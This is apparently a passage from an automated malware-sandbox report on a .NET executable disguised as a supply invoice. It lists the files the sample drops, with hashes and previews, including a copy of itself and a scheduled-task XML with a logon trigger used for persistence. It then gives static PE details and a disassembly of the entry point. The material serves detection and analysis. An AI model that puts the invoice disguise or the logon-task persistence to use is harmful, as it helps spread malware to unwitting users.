                                                                                                                              https://www.wbtd.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 47.253.61.56

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dpqsbGoWdXlp.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z1SupplyInvoiceCM60916_Doc.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:true
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.380747059108785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                                                                                                                              MD5:4D3B8C97355CF67072ABECB12613F72B
                                                                                                                              SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                                                                                                                              SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                                                                                                                              SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                              C:\Users\user\AppData\Local\Temp\7-j38IBI

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):196608
                                                                                                                              Entropy (8bit):1.1239949490932863
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                              MD5:271D5F995996735B01672CF227C81C17
                                                                                                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cc0lyqv.lwx.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25shhdnp.ojo.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jotehpq.34b.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fojkxgy.kdg.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3n5bjtu.xsn.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1rocwoz.onv.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ityic10c.v0z.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnlduawj.ynr.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp68D8.tmp

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1599
                                                                                                                              Entropy (8bit):5.099588163741439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUpCxv:cge7QYrFdOFzOzN33ODOiDdKrsuTopGv
                                                                                                                              MD5:3C561028589D3817F444E905EBC9D3D6
                                                                                                                              SHA1:E2A7AFD78C0778089D04B033114FECFDFCEADC9A
                                                                                                                              SHA-256:0AA78A336DECBFFB29818B596533A4F736F8FC103302C61D30E1731AB3762AD8
                                                                                                                              SHA-512:2DAFDB2B67B4EDD99FA2A8961F81DD7257D38EA8E8D9EC952F5AFF59DE2FB5B5591D029B75080814B2E94137B1DFB297BA5321678D3589136367C7A1EA35A2E6
                                                                                                                              Malicious:true
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp9353.tmp

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1599
                                                                                                                              Entropy (8bit):5.099588163741439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUpCxv:cge7QYrFdOFzOzN33ODOiDdKrsuTopGv
                                                                                                                              MD5:3C561028589D3817F444E905EBC9D3D6
                                                                                                                              SHA1:E2A7AFD78C0778089D04B033114FECFDFCEADC9A
                                                                                                                              SHA-256:0AA78A336DECBFFB29818B596533A4F736F8FC103302C61D30E1731AB3762AD8
                                                                                                                              SHA-512:2DAFDB2B67B4EDD99FA2A8961F81DD7257D38EA8E8D9EC952F5AFF59DE2FB5B5591D029B75080814B2E94137B1DFB297BA5321678D3589136367C7A1EA35A2E6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                                                                                              C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):949248
                                                                                                                              Entropy (8bit):7.546047142053318
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:j08rE/Yt9wmScoPQEnH1sdUg2mBHMTIOyHo4eV5mZLPQkwjTRQHNi+u:WzPdVYdBEIOyHofmZ/w/Rki
                                                                                                                              MD5:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              SHA1:951DB6EEEEF69C89D7096BA54AA8C4A95273B9A4
                                                                                                                              SHA-256:BBD7BA6F8AE2B651EEB05135BA638A2DE431BE9C9A8B347621391B733C95F865
                                                                                                                              SHA-512:F7BAE9FD84F98E3434F8E8D50BB03B2D60EC2F7365F2D396277E292AAB1028936C4E7C59A9676C949150DB35273344D5E5F39FBE86A2B87BA8E5C20A392452E8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7+.g..............0..p............... ........@.. ....................................@.................................5...O.......,...............................T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc...,............r..............@..@.reloc...............z..............@..B................i.......H............p...........[..0............................................0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*".($....*^..}.....(%......(.....*&..(&....*....0..%........r...prO..p.('..........,....o(.....*....0..+.........,..{......

                                                                                                                              C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.546047142053318
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                              File name:z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5:a903c6fb836f2c2c2762d1fde269bdb8
                                                                                                                              SHA1:951db6eeeef69c89d7096ba54aa8c4a95273b9a4
                                                                                                                              SHA256:bbd7ba6f8ae2b651eeb05135ba638a2de431be9c9a8b347621391b733c95f865
                                                                                                                              SHA512:f7bae9fd84f98e3434f8e8d50bb03b2d60ec2f7365f2d396277e292aab1028936c4e7c59a9676c949150db35273344d5e5f39fbe86a2b87ba8e5c20a392452e8
                                                                                                                              SSDEEP:12288:j08rE/Yt9wmScoPQEnH1sdUg2mBHMTIOyHo4eV5mZLPQkwjTRQHNi+u:WzPdVYdBEIOyHofmZ/w/Rki
                                                                                                                              TLSH:9E15E01822A98F05E4BA47F55A64E2344BB53D9DBC2AE3490EC57CEB3D737424E42B07
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7+.g..............0..p............... ........@.. ....................................@................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x4e8e8a
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x67032B37 [Mon Oct 7 00:28:39 2024 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
